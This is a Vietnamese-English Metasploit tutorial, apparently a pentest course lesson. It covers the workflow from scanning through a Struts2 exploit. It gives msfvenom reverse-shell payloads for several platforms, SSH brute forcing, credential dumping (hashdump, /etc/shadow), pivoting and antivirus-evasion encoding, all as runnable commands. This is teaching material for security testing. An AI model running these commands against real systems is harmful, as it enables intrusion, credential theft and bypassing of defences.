1. Metasploit Framework — Kiến trúc
Metasploit Architecture:
┌─────────────────────────────────────────────┐
│ Metasploit Framework │
├─────────────────────────────────────────────┤
│ Interfaces: │
│ ├── msfconsole (primary CLI) │
│ ├── msfweb (deprecated) │
│ └── REST API (for automation) │
├─────────────────────────────────────────────┤
│ Modules: │
│ ├── Exploits (~2500+ public exploits) │
│ ├── Payloads (singles, stagers, stages)│
│ ├── Auxiliary (scanners, fuzzers) │
│ ├── Post (post-exploitation) │
│ ├── Encoders (payload encoding) │
│ └── Evasion (AV bypass) │
├─────────────────────────────────────────────┤
│ Libraries: │
│ ├── Rex (sockets, protocols, encoders) │
│ ├── Msf::Core (framework core) │
│ └── Msf::Base (simplified API) │
├─────────────────────────────────────────────┤
│ Database: PostgreSQL (hosts, services, vulns)│
└─────────────────────────────────────────────┘
Editions:
Framework (Free/Open Source):
└── Full module library, msfconsole
Pro (Commercial):
├── Web UI, reporting
├── Automated exploitation
└── Social engineering campaigns
2. msfconsole — Sử dụng cơ bản
# Start Metasploit
msfconsole
# --- Database setup ---
msfdb init
db_status
# --- Module search ---
msf6 > search type:exploit platform:linux apache
msf6 > search cve:2024
msf6 > search name:tomcat type:exploit
# --- Module information ---
msf6 > info exploit/multi/http/apache_log4j_rce
msf6 > show options
msf6 > show payloads
msf6 > show targets
# --- Workspace management ---
msf6 > workspace -a pentest_example_com
msf6 > workspace pentest_example_com
msf6 > workspace -l
3. Exploitation Workflow
# Step 1: Reconnaissance with Metasploit
msf6 > db_nmap -sV -sC -O -p- 10.0.0.1
msf6 > hosts
msf6 > services
msf6 > vulns
# Step 2: Select exploit
msf6 > use exploit/multi/http/apache_struts2_content_type_ognl
# Step 3: Configure options
msf6 exploit(apache_struts2...) > set RHOSTS 10.0.0.1
msf6 exploit(apache_struts2...) > set RPORT 8080
msf6 exploit(apache_struts2...) > set TARGETURI /struts2-showcase/
msf6 exploit(apache_struts2...) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 exploit(apache_struts2...) > set LHOST 10.0.0.100
msf6 exploit(apache_struts2...) > set LPORT 4444
# Step 4: Verify settings
msf6 exploit(apache_struts2...) > show options
msf6 exploit(apache_struts2...) > check # Non-intrusive check if vulnerable
# Step 5: Execute
msf6 exploit(apache_struts2...) > exploit
# or: run
# Step 6: Post-exploitation (Meterpreter session)
meterpreter > sysinfo
meterpreter > getuid
meterpreter > ifconfig
meterpreter > ps
meterpreter > hashdump
4. Payloads
Payload Types:
Singles: Self-contained (e.g., exec command)
Stagers: Small payload that downloads stage
Stages: Larger payload downloaded by stager
Naming: platform/arch/type/connection
Example: linux/x64/meterpreter/reverse_tcp
└─os──┘└arch┘└──type───┘└─connection─┘
Connection Types:
reverse_tcp : Target connects back to attacker
bind_tcp : Attacker connects to target
reverse_http : Reverse via HTTP (bypass firewall)
reverse_https : Reverse via HTTPS (encrypted)
# --- msfvenom — Payload Generator ---
# Linux reverse shell
msfvenom -p linux/x64/meterpreter/reverse_tcp \
LHOST=10.0.0.100 LPORT=4444 \
-f elf -o payload.elf
# Windows reverse shell
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=10.0.0.100 LPORT=4444 \
-f exe -o payload.exe
# Python reverse shell
msfvenom -p python/meterpreter/reverse_tcp \
LHOST=10.0.0.100 LPORT=4444 \
-f raw -o payload.py
# Web shell (PHP)
msfvenom -p php/meterpreter/reverse_tcp \
LHOST=10.0.0.100 LPORT=4444 \
-f raw -o shell.php
# --- Listener setup ---
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 > set LHOST 10.0.0.100
msf6 > set LPORT 4444
msf6 > exploit -j # Run as background job
5. Auxiliary Modules
# --- Scanning ---
# SSH version scanner
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 > set RHOSTS 10.0.0.0/24
msf6 > set THREADS 50
msf6 > run
# HTTP directory scanner
msf6 > use auxiliary/scanner/http/dir_scanner
msf6 > set RHOSTS 10.0.0.1
msf6 > set DICTIONARY /usr/share/wordlists/dirb/common.txt
msf6 > run
# SMB share enumeration
msf6 > use auxiliary/scanner/smb/smb_enumshares
msf6 > set RHOSTS 10.0.0.0/24
msf6 > run
# --- Credential testing ---
# SSH brute force
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 > set RHOSTS 10.0.0.1
msf6 > set USERNAME root
msf6 > set PASS_FILE /usr/share/wordlists/rockyou-top1000.txt
msf6 > set STOP_ON_SUCCESS true
msf6 > run
# --- Fuzzing ---
msf6 > use auxiliary/fuzzers/http/http_form_field
msf6 > set RHOSTS 10.0.0.1
msf6 > set RPORT 8080
msf6 > run
6. Post-Exploitation
# --- Meterpreter Post-Exploitation ---
# System info
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
# Network info
meterpreter > ifconfig
meterpreter > route
meterpreter > arp
meterpreter > netstat
# File system
meterpreter > pwd
meterpreter > ls
meterpreter > download /etc/shadow
meterpreter > upload local_file.sh /tmp/
# Process management
meterpreter > ps
meterpreter > migrate 1234 # Migrate to another process
# Credential harvesting
meterpreter > hashdump
meterpreter > run post/linux/gather/hashdump
meterpreter > run post/multi/gather/ssh_creds
# Privilege escalation
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > getsystem # Windows only
# Pivoting — access internal networks
meterpreter > run autoroute -s 192.168.1.0/24
meterpreter > run autoroute -p # Print routes
# Now msf can reach 192.168.1.x through the compromised host
# Port forwarding
meterpreter > portfwd add -l 3389 -p 3389 -r 192.168.1.10
# Access internal RDP via localhost:3389
# Session management
meterpreter > background
msf6 > sessions -l # List sessions
msf6 > sessions -i 1 # Interact with session 1
7. Evasion Techniques
# --- Payload encoding ---
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=10.0.0.100 LPORT=443 \
-e x64/xor_dynamic \
-i 5 \
-f exe -o encoded_payload.exe
# --- Evasion modules ---
msf6 > use evasion/windows/windows_defender_exe
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 10.0.0.100
msf6 > generate -f /tmp/evasion.exe
# --- Sleep/delay techniques ---
# Payload sleeps before executing to evade sandbox analysis
msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=10.0.0.100 LPORT=443 \
PrependMigrate=true \
-f exe -o delayed.exe
Evasion Best Practices (for pentest purposes):
├── Test in isolated lab first
├── Use encrypted channels (HTTPS, DNS)
├── Avoid touching disk when possible
├── Living-off-the-land (LOLBins)
├── Timestamp modification
├── Log cleanup (only with authorization!)
└── Document all evasion techniques used
⚠️ IMPORTANT:
- Only use in authorized pentest engagements
- Document every action for the report
- Never use against production without explicit approval
- Clean up all artifacts after testing
8. Automation với Resource Scripts
# auto_scan.rc — Metasploit resource script
# Usage: msfconsole -r auto_scan.rc
# Setup workspace
workspace -a auto_pentest
setg RHOSTS 10.0.0.0/24
# Phase 1: Discovery
use auxiliary/scanner/portscan/tcp
set PORTS 21,22,23,25,80,110,139,443,445,3306,3389,5432,8080
set THREADS 50
run
# Phase 2: Service enumeration
use auxiliary/scanner/ssh/ssh_version
run
use auxiliary/scanner/http/http_version
set PORTS 80,443,8080
run
use auxiliary/scanner/smb/smb_version
run
# Phase 3: Vulnerability check
use auxiliary/scanner/smb/smb_ms17_010
run
# Export results
hosts -o /tmp/hosts.csv
services -o /tmp/services.csv
vulns -o /tmp/vulns.csv
9. Tổng kết
- Metasploit: Framework exploitation hàng đầu — exploits, payloads, post-exploitation
- msfconsole: Interface chính — search, use, set, exploit
- Payloads: Meterpreter (full-featured), reverse/bind, staged/stageless
- Post-exploitation: Pivoting, credential harvesting, lateral movement
- Evasion: Encoding, evasion modules, encrypted channels
- Automation: Resource scripts, REST API integration
Bài tiếp theo sẽ khám phá Cloud Pentesting — AWS, Azure, GCP.